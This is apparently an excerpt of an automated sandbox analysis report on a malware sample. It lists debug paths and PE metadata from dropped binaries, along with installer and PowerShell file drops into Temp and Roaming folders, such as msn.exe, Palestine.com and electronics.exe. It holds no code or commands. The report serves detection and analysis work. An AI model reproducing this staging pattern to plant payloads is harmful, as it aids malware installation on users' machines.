                Source: Binary string: C:\Users\Avery_IronMan\Documents\project\BigDataServer\HttpUtility\x64\Release\HttpUtilityV2.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Sql.pdb00 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\USBInfoLib\x64\Release\USBInfoLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\agent\_work\4\s\binaries\amd64ret\bin\amd64\\vcruntime140_1d.amd64.pdb!!! source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtscript\lib\Qt5ScriptTools.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\ja\workspace\common\ati-shell\3260\product\exe\vsa64\release\ti_managers_proxy_stub.pdb|| source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_InstallTools\DeviceUninstall\x64\Release\DeviceUninstall.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\mb_home\production_V5.9\Service\ServiceSDK\Release\MB_Home\MB_Home.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: contactsUX.pdb source: msn.exe, 00000027.00000002.2223565420.000000005A701000.00000020.00000001.01000000.00000012.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtscript\lib\Qt5Script.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msncore.pdb source: msn.exe, 00000027.00000002.2194406333.0000000059101000.00000020.00000001.01000000.00000010.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\UninstallFanCtrlSvcLib\x64\Release\UninstallFanCtrlSvcLib.pdb2 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ML\Code\ACUT\Server\ACUT V2.2.12.0\ACUninstallTool\x64\Release\HalUninstall.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Microsoft.Developer.IdentityService.GitHubProvider.UI.dll.33.dr Static PE information: 0xFB675EC8 [Wed Aug 29 18:34:48 2103 UTC]
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.exe.17.dr Static PE information: section name: .didata
                Source: V2DDYDPIWYUTCJYUB0IV5.exe.31.dr Static PE information: section name: .didata
                Source: clrjit.dll.33.dr Static PE information: section name: _RDATA
                Source: CN.dll.33.dr Static PE information: section name: .buildid
                Source: CN.dll.33.dr Static PE information: section name: .xdata
                Source: tipskins.dll.33.dr Static PE information: section name: .didat

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\UninstallFanCtrlSvcLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-LB16K.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\ICSharpCode.SharpZipLib.dll (copy)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msvcr80.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.Storage.Common.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\FAN.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-CCHIR.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-4L189.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-O6NPJ.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-BIPBA.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.Storage.Blob.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\aaHMLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-MB90D.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5OpenGL.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-56DJF.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\SDL3.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\vcruntime140_1d.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-QPNLV.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Sql.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\NICInfoLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Uninstaller.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-RGA67.tmp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Data.Entity.Design.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-03H4T.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HardDiskCapacityLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\windowplugin.dll (copy)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.SharePoint.BusinessData.Administration.Client.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-1BB9P.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\vcruntime140.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-LLMGF.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\MB_Home.dll (copy)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\NuGet.Build.Tasks.Pack.resources.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-QM6QO.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-HA2SV.tmp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\System.ServiceModel.Web.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\vcruntime140d.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-IOD6F.tmp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\WinPixSysMonController.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HttpUtilityV2.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\PocoInitializer.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\SDL3_ttf.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HWComponentPlugin.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Network.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-Q7DQ7.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DeviceUninstall.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\USBInfoLib.dll (copy)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\contactsUX.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-OGG5H.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Roaming\Panorado\is-2QEM3.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-87NKD.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-IR9SP.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\LogHelper.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\libssl-1_1-x64.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DRAMSpeedLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\UserExperienceImprovementPlugin.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe File created: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\VGAManufacturerLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-BHL7J.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\ti_managers_proxy_stub.dll (copy)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\CloudStorageService.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DRAMManufacturerLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-8VJ6H.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-EVHCR.tmp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msncore.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Roaming\Panorado\electronics.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-9EE7H.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\msvcp140_1.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Core.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.KeyVault.Core.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-N2CN3.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\msvcp140.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Steam2.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe File created: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-NEQ1G.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-9SPC4.tmp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\bass.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-I6BL7.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-KH84M.tmp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Developer.IdentityService.GitHubProvider.UI.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-U43LQ.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-AOFIL.tmp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\mc_dec_aac.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-9IN29.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-EQNNJ.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\libusb-1.0.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DIMMCapacityLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-D20BS.tmp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.NET.Build.Extensions.Tasks.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-DUCDE.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-UADI4.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\cpuidsdk.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\libcrypto-1_1-x64.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp File created: C:\Users\user\AppData\Local\Temp\is-I30SH.tmp\_isetup\_setup64.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\VGATypeLib.dll (copy)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.VisualStudio.Text.Logic.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\OPHWInfo.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe File created: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-TCI75.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-9K44C.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Newtonsoft.Json.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-RHD94.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Svg.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-56B19.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\KillProcess.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AIControlLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\ServiceUninstall.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-NMS81.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\CPUTypeCmdLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AsSQLHelper.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\AsusBusinessIntelligenceCPPLib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-JPD1F.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-O945R.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\aaHMLib_x64.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5ScriptTools.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp File created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HalUninstall.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-8FE4M.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-BUBHC.tmpJump to dropped file
